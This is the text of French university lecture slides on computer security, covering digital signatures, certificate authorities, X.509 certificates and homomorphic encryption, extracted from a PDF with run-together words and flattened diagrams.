La procédureOn prend l’empreinte du messageOn la code avec sa clé privéeOn l’expédieLe destinataire décode l’empreinte avec la clé publique etcompare les 2 empreintes
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 214 / 229
Chiffrement asymétrique : Signature
BobAlice
Message
Message
Algo Hash
Algo Chiffrement
Hash Codé
Message
Clé privéede Bob
Algorithmede
chiffrement
Hash
Hash chiffré
Algorithmede
hashage
Clé publiquede Bob
Algorithmede
déchiffrement
Hash
Comparaison
Hash codé
Hash déchiffré
Algorithmede
hashage
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 215 / 229
Autorité de certification
A qui appartient la clé publique ?Possibilité d’usurpation d’identité
UtilisateurMachine
Problème de confianceNotion de tiers de confianceNotion d’autorité de certification
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 216 / 229
Autorité de certification : création
Une "autorité de certification" est désignée "d’un communaccord" par sa communautéElle génère son bi-clé (couple clé publique/clé privée)Elle génère un certificat auto-signéLe certificat est délivré à chaque membre de la communauté.Les membres l’intègrent dans les navigateurs.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 217 / 229
Autorité de certification : création
Verisign
Clé publiquede Verisign
Clé Publiquede Verisign
Certificateur : Verisign
Objet : Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé
Clé privéede Verisign
chiffrement RSA
Hash
Hash chiffré
hashage MD5
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 218 / 229
Autorité de certification : certification
Un membre de la communauté crée son bi-cléIl va auprès de l’Autorité d’enregistrement se faire reconnaîtreet valider son certificat.L’AE envoie la signature à l’ACL’AC signe avec sa clé privée le certificat.Le membre récupère le certificat et l’intègre dans son serveur.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 219 / 229
Autorité de certification : certification
Verisign
BNP
Clé privéede Verisign
chiffrement RSA
Hash
Hash chiffré
Clé Publiquede BNP
Certificateur : Verisign
Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé
hashage MD5
Vérificationidentité
Clé publiquede BNP
Génération
Clé privéede BNP
Clé publiquede BNP
Publication web
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 220 / 229
Autorité de certification : utilisation
L’utilisateur, membre de la communauté reçoit le certificat.Il regarde dans le certificat l’AC.Il la reconnaît et regarde si la signature du certificat estexacte.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 221 / 229
Autorité de certification : chaîne
Une AC peut-être membre d’une communauté avec elle-mêmeune ACLa vérification se répète :Vérification du certificat (arrêt et validation si l’AC l’ayantgénéré est reconnue)Vérification du certificat de l’AC auprès de l’AC supérieure(arrêt si celle-ci est reconnue).Boucle jusqu’à
AC auto-certifiée (que l’utilisateur accepte ou non)AC reconnue
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 222 / 229
Autorité de certification
Les navigateurs sont livrés avec des ACVerisignComodoetc..Pas encore d’AC administrative française (En cours deréflexion)Les CRL
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 223 / 229
Preuve
Beaucoup de contraintes pour les signatures
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 224 / 229
Certificats : Une norme X509
Que contient un certificat ?Une clé publiqueUn identifiant (email ou nom de machine)Un rôle (chiffrement, signature, AC)Des renseignements administratifs
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 225 / 229
Certificats : Une norme X509
Certificate:Data:
Version: 1 (0x0)Serial Number: 7829 (0x1e95)Signature Algorithm: md5WithRSAEncryptionIssuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,CN=Thawte Server CA/[email protected]
ValidityNot Before: Jul 9 16:04:02 1998 GMTNot After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,OU=FreeSoft, CN=www.freesoft.org/[email protected]
Subject Public Key Info:Public Key Algorithm: rsaEncryptionRSA Public Key: (1024 bit)
Modulus (1024 bit):00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 226 / 229
Les AC pré-chargées
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 227 / 229
Le chiffrement homomorphe et le chiffrement fonctionnel
récent : 2009 pour les vrais débutsLe chiffrement homomorphe
permet de faire des "calculs" sur des données chiffréesle résultat est chiffré.
Le chiffrement fonctionnelpérimètre principal : les bases de donnéesfournit des résultats "clairs" sur des données chiffrées
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 228 / 229
URLographie
http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/crypto.pdf
http://cr.yp.to/
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 229 / 229